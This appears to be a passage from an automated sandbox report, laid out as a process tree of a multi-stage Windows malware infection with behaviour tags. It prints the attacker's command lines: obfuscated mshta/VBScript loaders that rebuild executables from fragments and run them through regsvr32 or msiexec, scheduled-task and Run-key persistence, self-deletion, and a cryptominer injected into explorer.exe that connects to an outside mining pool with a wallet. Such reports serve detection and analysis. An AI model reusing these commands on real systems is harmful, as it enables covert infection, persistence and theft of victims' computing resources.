C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\utluuspk.r32\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\utluuspk.r32\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\utluuspk.r32\gcleaner.exe /mixfive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn3zi1s2.bp4\autosubplayer.exe /S & exit13⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1dnn43h5.jib\installer.exe /qn CAMPAIGN=654 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\1dnn43h5.jib\installer.exeC:\Users\Admin\AppData\Local\Temp\1dnn43h5.jib\installer.exe /qn CAMPAIGN=65414⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\te3fe2vo.vo4\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\te3fe2vo.vo4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\te3fe2vo.vo4\GcleanerEU.exe /eufive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ze13ncxb.2fp\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ze13ncxb.2fp\installer.exeC:\Users\Admin\AppData\Local\Temp\ze13ncxb.2fp\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r22z4tzp.zma\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\r22z4tzp.zma\any.exeC:\Users\Admin\AppData\Local\Temp\r22z4tzp.zma\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\r22z4tzp.zma\any.exe"C:\Users\Admin\AppData\Local\Temp\r22z4tzp.zma\any.exe" -u15⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\on30vuei.yna\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\on30vuei.yna\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\on30vuei.yna\gcleaner.exe /mixfive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gw2z0p5o.vn1\autosubplayer.exe /S & exit13⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\x7Hv0areTYToP3bcsReDxK6I.exe"C:\Users\Admin\Pictures\Adobe Films\x7Hv0areTYToP3bcsReDxK6I.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im x7Hv0areTYToP3bcsReDxK6I.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\x7Hv0areTYToP3bcsReDxK6I.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im x7Hv0areTYToP3bcsReDxK6I.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\2cXpgEd_3C58sTQEbz5GciRz.exe"C:\Users\Admin\Pictures\Adobe Films\2cXpgEd_3C58sTQEbz5GciRz.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\q0EEv1CHHggzp0rzjAvkNWcT.exe"C:\Users\Admin\Pictures\Adobe Films\q0EEv1CHHggzp0rzjAvkNWcT.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\q0EEv1CHHggzp0rzjAvkNWcT.exe"C:\Users\Admin\Pictures\Adobe Films\q0EEv1CHHggzp0rzjAvkNWcT.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\9dGJsTt438VmesvmGk6ByPU3.exe"C:\Users\Admin\Pictures\Adobe Films\9dGJsTt438VmesvmGk6ByPU3.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\68NfRvVPc0dMj0Af1gDD6Umk.exe"C:\Users\Admin\Pictures\Adobe Films\68NfRvVPc0dMj0Af1gDD6Umk.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\68NfRvVPc0dMj0Af1gDD6Umk.exe"C:\Users\Admin\Pictures\Adobe Films\68NfRvVPc0dMj0Af1gDD6Umk.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\famshBCMChLogVFVd1wB4nrO.exe"C:\Users\Admin\Pictures\Adobe Films\famshBCMChLogVFVd1wB4nrO.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1e8,0x1e4,0x208,0x1e0,0x7ff87a8cdec0,0x7ff87a8cded0,0x7ff87a8cdee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,14884473605449230968,16258878518785432348,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5328_1830938947" --mojo-platform-channel-handle=1756 /prefetch:810⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon173a360b525.exeMon173a360b525.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2028737975.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\2028737975.exe"C:\Users\Admin\AppData\Local\Temp\2028737975.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3653892875.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\3653892875.exe"C:\Users\Admin\AppData\Local\Temp\3653892875.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon173a360b525.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon173a360b525.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17332e41e6b.exeMon17332e41e6b.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8432954.exe"C:\Users\Admin\AppData\Roaming\8432954.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7061122.exe"C:\Users\Admin\AppData\Roaming\7061122.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\825550.exe"C:\Users\Admin\AppData\Roaming\825550.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\6659323.exe"C:\Users\Admin\AppData\Roaming\6659323.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3963561.exe"C:\Users\Admin\AppData\Roaming\3963561.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\3963561.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\3963561.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0 , TrUE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\3963561.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "" == "" for %c in ( "C:\Users\Admin\AppData\Roaming\3963561.exe" ) do taskkill -IM "%~nxc" -f9⤵
-
C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if ""/PdmLkTgclA1F1vCuy4x"" == """" for %c in ( ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ) do taskkill -IM ""%~nxc"" -f " , 0 , TrUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "/PdmLkTgclA1F1vCuy4x" == "" for %c in ( "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ) do taskkill -IM "%~nxc" -f12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPt: clOSE ( creatEoBjecT ( "wScripT.SheLL").rUn ( "CMD /R EchO | sET /P = ""MZ"" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q + jD6c~d.d + xtSWZV.KD+ KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s " , 0 , True) )11⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EchO | sET /P = "MZ" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q +jD6c~d.d + xtSWZV.KD+ KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>GGEDXaPF.3N"13⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -u ..\cKW6.mXo -s13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "3963561.exe" -f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\208712.exe"C:\Users\Admin\AppData\Roaming\208712.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon178d8e5d06822.exeMon178d8e5d06822.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe" & del C:\ProgramData\*.dll & exit9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW01.exe /f10⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3298117.exe"C:\Users\Admin\AppData\Roaming\3298117.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1798190.exe"C:\Users\Admin\AppData\Roaming\1798190.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6436128.exe"C:\Users\Admin\AppData\Roaming\6436128.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7975096.exe"C:\Users\Admin\AppData\Roaming\7975096.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\7975096.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\7975096.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0 , TrUE ) )10⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\7975096.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "" == "" for %c in ( "C:\Users\Admin\AppData\Roaming\7975096.exe" ) do taskkill -IM "%~nxc" -f11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "7975096.exe" -f12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\8445622.exe"C:\Users\Admin\AppData\Roaming\8445622.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\1867620.exe"C:\Users\Admin\AppData\Roaming\1867620.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 7929⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 8049⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 8129⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 8249⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 8769⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"8⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2768 -s 15529⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"10⤵
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x19c,0x1e8,0x7ff87a8cdec0,0x7ff87a8cded0,0x7ff87a8cdee011⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff6ad3a9e70,0x7ff6ad3a9e80,0x7ff6ad3a9e9012⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=2072 /prefetch:811⤵
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=2060 /prefetch:811⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2596 /prefetch:111⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
-
